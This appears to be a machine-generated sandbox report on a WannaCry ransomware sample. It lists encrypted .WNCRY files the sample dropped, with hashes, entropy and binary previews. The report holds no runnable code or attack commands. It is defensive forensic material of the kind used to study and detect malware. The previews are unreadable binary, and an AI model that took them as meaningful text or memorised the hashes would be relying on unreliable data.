SSDEEP:	96:ooGTzlvwYIUdu3iZYu8gf2ITDxLCarHXCoTM28tFpKsI5QYtKzTUhY:v8VQgfnRGYSoQhtFpK1qYtKvUhY
MD5:	CEF40BC1ABEF7B4990FCC9469F271F76
SHA1:	D47D6232C40BBE114EBF76DE037ABB5DC884859C
SHA-256:	A9099E61E308F8921D6713B1FF415E86BFD455CD51F7164BF4E7922D80C5050A
SHA-512:	63701372445160CA89C8669B464F9ABFB76B9FC6436F2690137887723083596557C8285BA449C2FFF22C4E78062EBA3605D83BC60F0B86218723FE193534B226
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!..... .>6.<..\|..b"..!...`.Y.%9\.J........l.G.-.k>I.D-..d.4..&..'}.+.&..TlZ./[zW......Z...j.0Vl+...6S.m7..ml&..L..N;..K.}...AByz. b........2P..@v;.Z.5V>.......O>'S....C_./=..8c.aiz...0...E.%..kb.....aQ....r..S~.'u......@..CM..tE.....P.........1..>.................B%&t..]../.#.H..,..y........\|./.NQ...5r.c.@F+." ..s8M...O.L...?.P..6#z..p.m.B...mwJ.+......[...f.....p.....6"..a.p...B.....+o.....h..Y...ZJ$:8.o...4.`.V...u..a....+t.x...V.n.Z...cC.......3\|......{.......O.J.2M.. ah.N.z...\|D...F..l.oKk@.e.#)y..[H1........R......h...S'..{.`...- T..( .=..?C..lm.CR.).Z(.g....a..<.,g.Qw._-.B...X E...{.x0u9.Z..E............}.-..8.UL.b.O.^77m....N..P..=4..J.nq..........8z.].-Q.c....y..r.........@-..A...=.UQ...\|.&..{.).P...O.w...UC..J...P..#...w....J........g.y.0RZ.i.J......u.j.E...-...fn O..(..a..R.O...#'......>.pP0......0..k....ar.'...b.`.E..4..~5....%z;8}..G.....U]..5...OD.._...((...}A......P.3.A7.IS.2..#.=.El......W.t..`.$.S..(;..,..U..iN.s.9..

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2022-02-23.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1768
Entropy (8bit):	7.882989626229696
Encrypted:	false
SSDEEP:	48:bkb5SjNqDKkwdm1RojAfjuVLwwIj5OnFl7MuLo/P+X:otSEDKkVXig+c+7Muo/P6
MD5:	CB9130BEC9A23F9AA686877937978078
SHA1:	7ACB4D01AE447A5C8AF837CEB9342EE8DAD4418B
SHA-256:	B12C642595BE3D46C7AD1653896AF1A0B5DD0FE46AEFB421CC253E49307B1E35
SHA-512:	4004A7A777BAA2B928D1C86F3738C6C226319021FC8950048D985F88A83F82CEB27C8DA396A7BB28D80D3D69F74ADD45E6B4D0BAC309F86D31DD560936503213
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......(NV.}(..N.~-=...g{=..N.....o.':.,.i$,.8....u.[..z.fy"<...S....!..]h..T...v...C........=.q.l\...v....L.Inrah.!.u.........<N.....}Dn..x.{.%.?B .2..L......=...Z.:...46..44....P~..GY..k..^...z..s........'...+.0.U.n.....}y..F?]..y=.....&...=.,Sn..2...............N....F[}....i%9p.fr..x.........;..o(..dJ.I?X.~.>7.j......Hk...wM..<....w.C2..a...uZ.1.>n..m.fr2v.../...z...M..... m....{.4Mn...n,+..c@...7....4.g.3.......X.....@k('L.....c. A......X.T.....{....X...h......x.+.w..;..Ib...xq.....Dp..]..u........)....e+Xw....Ft..J...l._.5V..3._..I1..n.2_lT....rb...<j.6e<..I.S...@.H.......q...v..S .e/=s.K....pto...d{gU......<\.6..Hr3z...R.$...\|...g.S....>?.g..#.w..1-.q.......Qg...6..G..w...... ^K..l..6`gak....f..4.....!....? .....&..dW.tgQC..H7..D.F.....D~.lY5.,..B.9!D.<....S.y...b.2.3\|.uD.0c.... .-_V.kX%...UI%bL...C...8.(=-1u....UE..A..1..,........."y.w!....#C..S...h...."./...\|....%.+...Q..Hr..*.m........7..........x`.c....i{.+j..<.....q.wS.....[..HC..

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2023-05-25.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1864
Entropy (8bit):	7.883478873650741
Encrypted:	false
SSDEEP:	48:bkjpkrm+a4etwDMtnLfAySrR9SjE1hAjl9GI:ojua+LBQtjAycXuE12GI
MD5:	5060DEBEDE9F2AB6FF74BD714BD2B05F
SHA1:	225DDC7849611CE828FE5948E9AEE9116AABC4EA
SHA-256:	F497101E53D340AD6CDC7F1386E252E98760546B1375F8C97C7D71F94E19D02A
SHA-512:	12EA3B46E555AD832437420B672CBD0CBE0E170FF49847804F8E018C5682407A16CC8391E8AD76B93A52633BA21322F06059BD9A0F89F5CD3442AC1B8BEEAC94
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......i]...N.\.?.g...z@[..=.......<X..=%.6c.~.5.......:.;..F....b.L..l..Wn....X.v{.I..V.........pM<j.....zK>.ml..R...i..jQ3.E.....=...w'4.\|.py..S.....k:.....9.B...Iu.).OP[.........m...v.2...!X......w..p....\|}.l..Q:...@qcsO..5...:.vD!-..........#........G.w+.J:?.^p.v.p<.jp.9.r....{S.v......^....a)...y4E..5.....B.Q..t8,..@...P.$).....FsBW>.$.Y.>v.UBG....).lV.g.1.jRZ...P{P..[..[..0...Ie.k.V.{{....I'..Wh.Sq...\|. (oW..S....Z....G.......\|s....&$NF...5@.>(....2..4.w..T5`tXJ.p..&......3..C..Q.)1.....H....n..>.((...`@[Z)..x.pK..DH.]....{H<.\|.a.&j.4.\3...E.!...w....C..YH..c........uUt...1\|....._'Z..<.[8.......a.......$.[dC.d.k.`;..[h.....SI..!X....k...+.T.Y.^.b.x...:.8+.......3.a.%....G....o..5....A...>V...e...g-d...9.0.C.T#:f.~+..QD.qJ.Y.,....p.t..C.?A4.../.5.i..PZ.].H0.....PN3.p<s.f^.n.....V;T.?.^.nu..->.6...........8.o.^......t.8.r../64%D...=.....'[5(l*...f.or..tP........v....g....n..+'..t.j....5...Y:.N.....?7..b_z...E....}....

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2023-05-26.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	5912
Entropy (8bit):	7.9703728862125045
Encrypted:	false
SSDEEP:	96:o+2HJfkOUazcfVOzBJ624nXp64I6v0CWaWSJisCDt4qtHBPQiYU8LyGr8u2LRbTw:R2ttUazcfVOzBJh404InCWaWSJiLxBfE
MD5:	4BCA4895F79F0C9B8FF074989A461E0E
SHA1:	60B79068B1E8A61089A7DF183C22F1BD698FC2FE
SHA-256:	CF5F11B0D9291498F5E80E00F8D86963844A7DB508FA2E1FBBB01503442E6615
SHA-512:	91EAC84BE1F0D8295F2EC35699A1C9B31970B33B01914024B5762ED1095EF3090875EFD897C05F3E29445FA4AB68376D2B24395D7D1C722520645BEF0D591398
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......c.l.`V...B...b..r...:..5..{RM Gr.L....r.>..E.....)o`..L.%.1..?..m.....b~.2.....e.;..4..I.xOUX..g...A....=.k....X6.........Qc.l..b..lT.~........Qj.....iA...9K.OBJ:L.L.I.....Y...:@../......*c..o.%.z..R.i.....-...nph..^...3.mg..^..s..p,m.............2+.}..#zo.m.3......0./..4.SHf..:.\|.2...........O..0BD...@../.L..K"..".(c..CM..d.. ..h.......V..X..)....u........y...E....../......p...\..L.jQ...u}_..~..Enu.....5p....}..v.-v.N2G.$.r..IA..!.. ........q.j......!...B.7S..V3..=q...6.C.{I..s...X...h...e..>..^.fl.".A...y...q.5.....L....A.v.tX2.m91..q.9....D.LJ.V+..9e-..<...g!M.%....^...C..!(.M`1<.jx.?..a.\S'.&O....y...@-..w...4H.1.C.\t..f9....^.@9..y ..H.{.!.....G..5.\.....W.s.C..Trq`..X.3=.k.U....IR..>....S7m.....H.4f.%..J.-...B.x.......-...u...<[......{3S.X.j.{.yjm.c.6..Z.^... .$<.1.'Y.8....Rg..r.~mFn...A...-b+...I$J.Z..O...)..,g...R.W.)h.V.....K.3...R.EK..DT.._..E.&g8...Jqr..Pg$..9o....;....[...C....F.($...$..1D{....D..s...J

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Intel\GCC\gcc_svc_log_2023-08-05.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4264
Entropy (8bit):	7.953578305063991
Encrypted:	false
SSDEEP:	96:o+yGTXBeelsB5Iebizu3iYZ2Z0HMlJcaz106zKRWEqrSw:qGj8ssZizQZ7HoJpz1KRlq+w
MD5:	156F205F2D45E70E86E5058A15852E8D
SHA1:	4894B1719E7EBD23291E340A0720D41B9DC2995C
SHA-256:	0FF3BD617B7D07B51667904208A9DB6379BB125AFBA20F763FC2AFD3AE3A928D
SHA-512:	8890CB1C3411BA89E942B91E968F6531199082A9852664BBB01A4A9CC0FBAAA1F8C30E9425AC6C795F4D4BE9E76D394F0136A87B686711082B3B01C2F21D9CB9
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Z............3HQ.J.9S.um@n0....-..T....'AB...`).\|o...?l..Z..l@....L.e.o...P\.j.A..;"..%2......&y..^..EB.t=.6d..h..z..5g.}5q.......c.......i.p.'.^@I!.\|_.F._V.<..`........Uwa7.9...l#.]..n..F3P:.e.c!..B.$...G...-N..U.`..%.O.!....G...>z......_!..................s....p...,...(.v.c.GCj.2.b....O_@. [.N..K.{.......A..;...,..w4.J.%..6.9A{......;....u>...&.I. .w....n..j.l..1....p...9t...yEii...9y.,3.1nO.f..D.gs2...\|.;........54.@.K....y.29R.b...&p)] ...g.._-.....4.....A..*!#..-.O<t9F~Zt.YOy%..HX...O[b....d&......_..{.GQ...'..^.S.K..3r!`yB7.r.....bW.'.c.{...v..I!Cw..C...J8.....4.........#r.....v.Ut9M......p+H..c.T...(un...>..Hl..c..e...l.U...W.Ki......%.'........75.[....;..Xt.o.EV.1.K..M)T/..\|...{.=>.n.R....._JR2.e..fn?4VN. . .o/x.}#>...(r).......%..2...d....vR....E...O.5..<.....s.b....I...&)....\...x..;Bx....'...M...P.e.....hy...K.'.nc2...9...-v...~EOe..N]z`Y;.;..Fo...}...4..n......)..Z...~......Wx.Cuu....5....7....<.v..w...M..b..`A+.

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	516712
Entropy (8bit):	7.999696226855318
Encrypted:	true
SSDEEP:	12288:LRRxEZ70X8pADzVGr8iLFRDHI14/Y/sSRQ3x0MuBeYyOOnS2nr37s0ptfOv:VRN3JiLFRHQ0S6BvuB/Hyr37xJOv
MD5:	7CD2B0076E71147768DDB9AFEC3B3D93
SHA1:	29853A506167DCBAE9953BAE4469B9157F7ABD3C
SHA-256:	D6E5FA5D7E04460BD94C5195175DC839CFA9790597A285321B00F9450CEC1B92
SHA-512:	8263E319CBD0356F8BBDAA77C8C84844968D16601B7667B592E3FD7D25C057CB99D81A86ACAE2C101830E7BB482FABBDB3A976824C8820BFC685E7A07BEB568D
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......26..@.......n.{p#k.FG..7..E.F....E..........G.$.....>......#.y..@Aa5~.%....,2..~.u.X.%.u4..s....d.....mc.d.k.....k........&.3...;............Co.......G...jf..{.p...DR}.CO^,3...Y..5Zf.4...[...Qu..4.b...bO.H....^R..I.]+....g...)..8..$....d.....H...........T....3.'.j./..{3O..4...\|l.7..MW.\.G............Z"Kd..,?.G.~...)j..&.$..T...0?.....w......G..7.,l.{mS.....!+.........l..xQ.v...$~..r.`^;..H.[....h.zV....k..>...G....S...}~.Czf..-..}......t.0.....r...`...K0.]S....O;....+1Q.8Lg..V.K....i..Jl.w.._.-8..,...~H.B...s.U..f..CB.TUN...^...]..vqM.T..>.%f....^K.c...E...;.g...)]X0..v..cr.Sb..l.D....~......D_n1.?.....`#.KR...!.u..7.bk........EL.0p.B:....._r.. ..x.A.K.nv`.\|LI...\|.....#.Z.,\|..4....N...=/2....'.63..E./.bI.p#.'..1l..v.".]-...{.[..Hh&..?8...G=.......s....- ..._............{...cK..x..`e[5D.s]Uwim.?..E~.J:.\..=....`<.P\|....i...+L.AD......i.tL..m..*.7.S..ghs.cF.~,.G#.C#....<.8p.R.a....L.....o'$0...k.h< .q.:@...`....&.

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.2107.4-0\ThirdPartyNotices.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7000
Entropy (8bit):	7.9739630122358856
Encrypted:	false
SSDEEP:	192:Si5ATyH2XHtLV0CDZ0jrf8/53z5QI247AI:S3TxHtVqrfO5FT
MD5:	6700558FD5CAE6834A4FC7E79B1C7FC3
SHA1:	11389ADF24C38AEC5D978D13176AB537E0C27C8D
SHA-256:	65AA7390AFC72A47DD9B0045A3E260083C43571ECCF91AAFB0F7967485C12BD9
SHA-512:	3B804B053778630906D8329BE416033D5233FF379B41063BEDFE09051600738312B86A0AA17F146F6AFA0EEF8FEDAA1A5A19635FB24216E2BD002910F6171717
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......Ycy/,.9.i.. .'..[Yj....'...TG.k2.;IW...........D..f.g..f....Z...r......[5........F)..!.}~../Y....!%...{.lG....}.j........(...<...,...`w..d.....%......2.h.k&.;...pCS.3q.o.\!.9..E.39;Xyx8OV.r.].4..J.N}.H.O...}.q.m....5..(.~T.p...c.r;\|..m..PN....=...........G.gh.u..r`..v..I0,..)....mU.%6...^.W.S.X..d....~H.~L.x@.J.J{.-rW332#.2..ywgN`.......=......`....4.....a.=........M...2..?..6F..<..c..~..OT..F.x..P#...l..=._{...}&.8T..MG...{.7.x5.u...p+5..MxkD....yi....<....I.\8.g.U....\.\+.'G...}...#.wz8.S...y..Cr.i1..]a....a&...<..:.....$8v.qGu..]kB....8......R.M..]\."".a,..j.%.....%D...Ib.6.4.F..E..t=..3LcYj.I!.m...b...".Z....Cf3.L=.@..u..&.....g&.r......J).t....#{..~..,....l}4"..%.SX?...w..3.fai./9.7F..[W...}6.+...Y.8:.]_...._...%...\|.9.6...g.2..;b;*e..t..3N.{.......N[H....^P]j.84..X...-f.9.......w>..pD6.BKo,.\.p.b$~.7.....$...\.9.OfR.O.>.q.....+........O..2...R..s..-]-..iM.E....G.wbx.{H.DO.^..)..B'..k..<....;..=.&.L6.U. ...._>......+.. `N{o

C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Platform\4.18.2108.7-0\ThirdPartyNotices.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	7000
Entropy (8bit):	7.976332457342148
Encrypted:	false
SSDEEP:	192:YGEZuzLyPgtjH+PdoWcySk7pjeSNbdQUNaN18KBnTr:XW4eF/cySkN5b2J8KBTr
MD5:	4D76F01E15FAEE541FC7D32B99540D75
SHA1:	5BEFDE4023857B0CA35F0C64EEBFF72FD5690A59
SHA-256:	D44F4BBC4BEDF5D54BB5BA2C278E92C664FAD3863BC26220204E9B5326B74352
SHA-512:	518AEBF29E3D865ECB1D0CD13C6DA12DA2726C2C42470E750E6327EB46E1AC32EF842828F5836C8C94A2DCC1DA924927F1B30C8ECE877916590FF2F5063FF31C
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....Y.\.%....m.2.s&.(.CSq...>...K.$..Q._8.t._X.v...@>:.#...m1....f.We...o..e....~..\|......).y{s..... .5L.....a..~k..S.C..o=./.......?q%_..qK/.cx.;f.v...\...eS..o.[..3..s!.K,..V.....4.@C....yD..h8i.&....c.!....J.:...[e..X...ws.@.x.}.O..IO1t..K'5.}.5(....=.......p..)~t.V.>Q&..6..w8....4..?.H.....".!/..{."&.J.v...).W.c.\|K}s...%.f7P".cH&A.i.GR......}.\|.h..5.,..(;........^0.<..S.0..1.'a`.\|..RS<T.Q..bn6w.^./\).l.35.iQ$.....,..j.....K.ZB.^...k.!N......(......L....U.&Y...R6..._U....<.T..(.......2..+..Q..e.F..`V.}Ar....y....-;._'.....W.H.k.(.^j.A..,.}..........=...@,W.[.:.....O?......t..5..^.f...2.OT.sU."....!....K.).i%s..\|..@...^\Z\:).[.x.....w.N..o.a<.W#g>U-..+._..N..<u!..HT\|.....Z..}1..>.uz..b~....9.....'W.tQ.u..2..#..A..!6...W.SY+.h6[....Z..]......m\..=...Ds.U....bh."......i.........Xu6.........1......j..o..@.\...$.m.S.>MO...o.....8..P,+C..o!.I...}M........C.e[A........%...-........zq:.Ac8..r................z....b.HdB....a.[...1.;{.p.._

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\male_names.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	6952
Entropy (8bit):	7.971259553319504
Encrypted:	false
SSDEEP:	192:dBb7aV39yqBvSmFd8+8bGqJU4mqCnKp9djAWB8GJPCyp:r7aFUq93Mmq19J8GJp
MD5:	304EF087A29A0A6AF6508F4175AD2EC4
SHA1:	B4F771056476B2BB65108D710072965D8169123D
SHA-256:	776C9364D09AB7C733D45B7CC3C84BB8577D9CE39448FF9BA98B6031639460CF
SHA-512:	3AEE4A3D171A84D1877835DAFEFC3D6F992870B71AB15B1526A27635297020122952C095110DE0972AAB257D201F68A29EE11CD44A49658AD71A41DD4322B68E
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....eH`E:.S.58I-.......Y..G.....y`N..I..ml^.zv.dT.......t.6...$..j...uir..M;..%.a]H.^_..y..V{...5.q....... t[.0;1P..]{.v.Mq.=.P]..e)......}S.N.r...../..)c..2.lq..&b.r^..-..$..X.G...w..)...0.J.((.\|.?...>l.C...}..3T.".B.!..#$Z<..m...f/...........d............U.tU..Q..C..T......R..A3.>."O....g...P.H.-..4.._S?n.\|^......9.mR.r.BT.O.:.Q.n..a-.......I.90E.....h.....c.?........&......T.e.R......R.l-?p.N../8..I/.^.v.t......I./.B...r41.$.y.%..s..c..{.....?..P...j.../u..I.u.{7...K...~...... ...1.`... .-H.....~i...]..l..?.M.d.7......I.......p..6-.#.jY...;VQZ..Kd.....H~.5..q9.._.$..J}...,.4%.H...Y....@...8@.,..+..9.U.K...!.r.~.>,V..H..}NC..N.dL..i&L.......7}..t...V...[.6.N....f..>.H.kE.....M..8:...U...H.9<.E.l.@....5..d..0o......._.4.....L.J....wN..i\|a'P./...=Q%..M.d.f....Kf^.`..xD.%XE....T..O.V...F.&......M......9.).3].A..].SA.@[.Z+...5...a...4zo........l......_....I...I.Xh.5"...g.f)W'.s.......T.i"`...E....._).....g...u.j...m.l.\|cx.;.

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	242232
Entropy (8bit):	7.999235052139601
Encrypted:	true
SSDEEP:	6144:DjTjA70myigUrnRfQwzxqKbpHFN4cI1FD:DPjrYgUrnRTxqKbplNFI1FD
MD5:	232108BAA604A75B60F73BC0CAA04D71
SHA1:	A39464198BAC165564C5C59BC612B1D54D873AB9
SHA-256:	7A3C96928772798F89AE30D24C3D8DCD960029815CB469DA4AE15EC09E35A417
SHA-512:	1DE4D8FE1C54B8872313B77141B0C7BBD6247FAF81E94BF4A6C91BB4EB625446E212B19201EFEE3BBDB38E2E355855BD1A5AC46C850FBB8278A71B0B02BFFD74
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......y.C>.Q.S.!dEv....[}...j./z.v...."^...a}...}.p3Q..].$W}.8...a.K.}3y..H.R).....0DT..z..8..\%V.4_..b.'..f.({............U..!....%JG/.z._...^F....P$M..q.,..+...~....\..=B....K\|.!..(...Z.a\\|...........X...o8{/.u..;-f/ o&w...9...B.s5......S.#....................t.}...38...`..T}..bdx......f..-.R.%(.*#,=.}..........m..4.Ep.d.<.......S....R...1.n..o...@......8..ue..~.dJV......c.AN...7;../y%...5h...X...!.?<.(\|0c.cs...q.KP.u.%..].;....K..n..B.....O.............(.z..y.@..6#'I....:{3..Z.l{...%{.3my....%'......]....X.g....`.9; ...A..;w?.b.}!...T.5..Tu......$!..._wT....GO....3.FX=..\....$$.&><...n..@..4..<}....f.A./~.Q7u.....M.....q...%.....b..\|2.I...G[./-.~..W.$......g..b...."..b$h.>.@..h........}.xZ.B..zI.u...6.....M+>....'q..>.....v.....G)6. .<~ Z~.......l.1...........O.u/0fz...........:....\|.j}...._.7S..e.{...gQ.u.?.- D^.nm.x`.M..[........[...%}@....... ....Xc....zT.........F.....d.+.....OV.....9.N...<~..$@+..n.y\|8):.!.........z.,..

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Google\Chrome\User Data\ZxcvbnData\1\surnames.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	76360
Entropy (8bit):	7.997692797409392
Encrypted:	true
SSDEEP:	1536:kcBJCim3qan5mR/5PZaLjoN7YeJACGt2mIHR0qP+8cDivw6YiXxmAsMId/:kl6d2MN/JAd2myP+piYI3Id/
MD5:	30E65CEF2DD54AAFA5C08768061D5C8F
SHA1:	AE8E6317D1AC0AC412CDBC4C95954E703F5B4E62
SHA-256:	DB3ED69A0166DFBCF077B04EFF7B4E681B5B3A80ACC66B3DEE0A311E95795D39
SHA-512:	27FECED04856862F0ED93847660FE138739F481F54884C2C8D42800844C586144A0D18791042DB9AA41F61C41E983FB42EA3777A51BB0212609B084F7D4F5662
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....NAa..pt.;.q.0.#..)A...a}.^..s...(.~..y_.`..k.]...T.W....{...?........l2.$\|.Ys'..A.^..=..N.....}.L..g2!Z.4..d.<.\|.F0....n.)l...w.G...F...Gn.....,nD..~......`.D[}.D.l....%..., Z.@"b.-Rs64.@..!.Je..V..".J....%.=.....1..n......"u..{$%{}..5.4........-).......N...t=Q...z.Q...My..4...Q..3Hr..S..8.../iyX/...hl..L..G(.#...U...X..?....G...1#0C`a.....Y.w..\...h.D..f.E.....[.VE.Fy..;....S.d.0.v-...Z.[@.4...-].........8mc..vIy..q..Bg....h.`.{=I...}...F0+W...?.hB....!.......bW.CF.+Tn..F..(..A...>.uW5..6{f..M.....8VL.. .....o.yd.>.p...?....h..0.J.h......Rv..x.#.......$.c=1..b^....!.ehnV....N...\&s......w.p#.#.q...(......U.....7.7.j.e.4 .!.3.....q.....H..#.?.x...%...<).MJ.R\..#+:.."4...h@N".NWn...=.6.y.W..Y.Y...~.#\L......x.W.".!.s..H..,h>.W.O.w...@../../yO.d.%..kz...O/u.fv.U7v)r.zk..0../G....B..).R.z.3.?..zH.B...-u........bKo%...e.s..Z..q...M.rR...k1..^R.1BI....DX.6N...T.:..#.^..u........H.m.....A..&....^H.&.^.5xHV$,.....<S..n.h....D.G.N

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Internet Explorer\brndlog.txt.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	4664
Entropy (8bit):	7.96284093424494
Encrypted:	false
SSDEEP:	96:o0G6xBl8JnavYn4k1orD5t1+QVFVr8H9bAGK8XUubfBFMUhuCfjT:TgJawn4NrD53+QTVr8dbAX8XU2ZVU+f
MD5:	18E6C66DB17BB24E15A58B765158CAB8
SHA1:	270AEEDADA83464D126B78BF88709543C7712764
SHA-256:	98A69D453263A1409D28AFAAACAF2152D7AD5D249A2A7C5ECFE6061BF76C61BE
SHA-512:	FF246B92C0487C82429484006B163034C7B6914EB4FB8DEE35C83F7401B39781D409A75C09AFCB4A0F5CCBB19A3BE6B06AE457ED969629A336106FBE45FBAFA8
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......`.....E.R..y..tn...0\y....hH.Sl......f.......&..~..q......Tt.w:c..;.0.h..%....h\Io.....=rf.....N T.P......U.;./.$....W...........g...........~(.......S....CR..6..^X...>].KI.9...E.L..a..S..=..E..1!.k0..> .JK.....k0=".Rs...\|.B.LK(.....x...................^w!)w.cwj._m`.....>+....[..^.)..}..Wa.M.<.p..4DAi.M..4.../...B...E..}oM1...umG.!.Z1........6..e.....w.oY?..A..k..Me.W4.mt..\|.~.q...T,..a.i.%..9....~/{V....P.....7.6o....<d.:...IhNu$.}.....&b....)mH...~C.2.)h..Z..eB.A...+..P......&.5l...>a.....u.Ah..S4&^.K....m.V..C....SF..Y.}..Z~.....S.r!....q$..b.m.../.....%({6......nFn.O............p.........&D+}.6.y-......G.e.t.j7..4%.={_..Qn.]$r..2..S.....'MVr.i..!.....E.~^.}:....-.....l......:...$3.......K..H......^jk.-.....\....4.fe8\|\|....S..5..D.......l.Bq.J.....I~.zC0].....z.t.t..g5.........8^.]..^...>..4.z.w.j8.D....g..O._....E..U....\|..ER..?..g.KY...c..V$..lm.7..P.WU...I&..i27..^.......~..r.....M.0.+P......Sq..........G.;..X..`.

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\1196d63c.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	6360
Entropy (8bit):	7.971296945350322
Encrypted:	false
SSDEEP:	96:oBEkkn9X2HMB5gIgoB1S6d8VqbyYQkV53ruwu71Z1RDFWpaPbqz0WDkT7v+qDEHD:iW1j3d5yYZ3ruRZnFWoOz0WCPgdL
MD5:	B5581184F9C264CCAB04430850F9C537
SHA1:	EDA966DA60BFA28170C3BE41BC8E97D6E5984BCE
SHA-256:	E0CB51880F7FA76FE3E9423D776413F57DD33083DB6EF5846FE862C1B3F4CD1D
SHA-512:	EEE65C5A703B4CD8BE266220274953F541945ADD14010E05B5B224A3C89BD8F769A54A6D2878371DFCCACFF91AB82AA2073DBC07B07C2C98A25794DBDB438125
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!....b^...19.\|...>\|..-.]./.......p..w.@.{..1..}.G>M..$.....N.....K........2Q..O.W..t....Xa.x......4.i\.n.L,.c$....m....w.,.Y.i..2....K>.u....ne..ij....E......kG'.s... i..?....3..H~.n....mY4.. z.[.1..2..>...!O.9..... .Y.?i.7.g.h.Mx....R.okb...+..q../J<...............F...9iK..m.c.B%.....C.V.-...mj..\|.....o.W.......A...3.8.<....h..-k...\|q...9?E......v..p4htD_.H.u.F.J..4E....Pv.._.....b...o._.....i..?.qY.T..r;3......Z.q@.RS....P..PG.\|....._. .h..D../.b.I..<..\.0...J....j..$B......0..D..Z.......=.o.T...`....H...7.Vj..[.......ht.`..o.1F..+.I?O6.Db.V..1.... ..@...y ..P1...V..{.c.%.V.....t36,Cs.ka'..\|5..7C.q.J..e......r..6T.s>G..... ..{5A...o!.....F.....N'Z`Ly.GE.../..ku.u.J8.m..4.n[..g`._..nxR,_....E.o.t.B..8.!}.}.fK4..N..$...k...@D..-;............. .\|p.'... .X......D.v<...t....Xq_@.>6.U.....^.4.+".'..y.Z6...J.%d..........To...a...SS.!..M.b.D....]...x~.m..."..i...p....../H..D.j...'.U..2'..G..%L..MX..4W...2l.z......o..T._.w..mVE..*ey..^].x..

C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Notifications\wpnidm\2b67b297.jpg.WNCRY (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	6760
Entropy (8bit):	7.973281897374574
Encrypted:	false
SSDEEP:	96:oPWOOgqlCdgZvgGvUkfHzQUxGZDOCUhj1pCbNyN1FaXubZ1bSJKOCDiWrCZN0yhT:dOO/Z5SyzPGcx1Yc7aX2nOqiZN0Py9SE
MD5:	A59B2635B35C4C74B6B5B520F0244E34
SHA1:	410579284633AB11186CBD3459D664AAA40ABF98
SHA-256:	74BD47BBBD9059F0290B30F575D952611051E3703C0DB29FD6719614BC262A65
SHA-512:	F978FA6265DD10C448D34F668F18C2A826F78D84200D73AD40BE3028C781C19AC19B6568EA1AF84466528807F2325CC19D69EF7783BD3328C8007F4ABE7AAC21
Malicious:	false
Reputation:	unknown
